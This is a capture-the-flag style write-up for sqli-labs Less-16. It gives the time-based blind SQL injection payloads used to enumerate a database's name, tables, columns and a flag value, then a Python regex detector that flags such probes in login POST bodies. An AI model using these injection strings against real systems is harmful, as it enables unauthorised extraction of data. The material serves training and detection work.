Less-16
Less-16 POST - Blind - Boolean/Time Based - Double quotes (boolean-based / time-delay blind injection, double-quoted POST parameter)
This challenge is solved with time-delay injection.
1. Test whether an injection point exists
uname=a") or sleep(3) #&passwd=a&submit=Submit
Delayed response => injection exists
2. Determine the parameter type
uname=1 or sleep(3) #&passwd=a&submit=Submit
Normal response => string type
3. Close the parameter's quoting
uname=a") or sleep(3) #&passwd=a&submit=Submit
Delayed response => closure succeeded
4. Guess the length of the database name
uname=1") or if(length(database())=7,1,sleep(5)) #&passwd=a&submit=Submit
Delayed response
uname=1") or if(length(database())=8,1,sleep(5)) #&passwd=a&submit=Submit
Normal response => the name is 8 characters long
6. Find the current database name
uname=1") or If(ascii(substr(database(),1,1))=114,1,sleep(5)) #&passwd=a&submit=Submit
Delayed response
uname=1") or If(ascii(substr(database(),1,1))=115,1,sleep(5)) #&passwd=a&submit=Submit
Normal response => ASCII value of the first character is 115
7. Enumerate the tables in the database
uname=1") or If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit
8. Enumerate the columns of the users table
uname=1") or If(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='ENR4qOJL' limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit
9. Read the data in the table's flag column
uname=1") or If(ascii(substr((select flag from ENR4qOJL limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit
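As an added example that is not part of this writeup, the following Python detector shows how a defender can flag the time-based probes above when scanning captured login POST bodies: it parses each body, matches every field against a handful of rules, and reports a body as a time-based probe when a delay function is combined with a quote breakout or a conditional. The sample bodies, rule names and thresholds are constructed here, not taken from sqli-labs.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies: one benign login, then probes of the kind shown in the writeup.
SAMPLE_BODIES = [
    "uname=alice&passwd=Tr0ub4dor&submit=Submit",
    'uname=a") or sleep(3) #&passwd=a&submit=Submit',
    'uname=1") or if(length(database())=8,1,sleep(5)) #&passwd=a&submit=Submit',
    'uname=1") or If(ascii(substr((select flag from ENR4qOJL limit 0,1),1,1))>1,1,sleep(3)) #'
    "&passwd=a&submit=Submit",
]

# Each rule names one trait of a blind injection probe; patterns run on the lower-cased field value.
RULES = [
    ("time_delay_function", re.compile(r"\b(sleep|benchmark)\s*\(")),   # forces a measurable delay
    ("conditional_inference", re.compile(r"\bif\s*\(")),                 # branches on a guessed fact
    ("char_extraction", re.compile(r"\b(ascii|substr|substring|mid)\s*\(")),
    ("schema_enumeration", re.compile(r"information_schema\.")),
    ("quote_breakout", re.compile(r"""["']\)?\s*(or|and)\b""")),         # closes the literal, adds a clause
    ("comment_truncation", re.compile(r"(#|--\s|/\*)\s*$")),            # discards the rest of the query
]


def scan_field(value):
    """Return the names of all rules matching one decoded form value."""
    lowered = value.lower()
    return [name for name, pattern in RULES if pattern.search(lowered)]


def scan_body(body):
    """Map each form field that triggered at least one rule to its list of rule names."""
    findings = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        hits = []
        for value in values:
            for name in scan_field(value):
                if name not in hits:
                    hits.append(name)
        if hits:
            findings[field] = hits
    return findings


def is_time_based_probe(body):
    """True when some field both delays the query and breaks out of the literal or branches on a guess."""
    for hits in scan_body(body).values():
        if "time_delay_function" in hits and (
            "quote_breakout" in hits or "conditional_inference" in hits
        ):
            return True
    return False


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(is_time_based_probe(body), scan_body(body))
```

Pairing these matches with the observed response latency (a request that both carries a delay function and takes seconds longer than the login endpoint's baseline) gives a much lower false-positive rate than the pattern match alone.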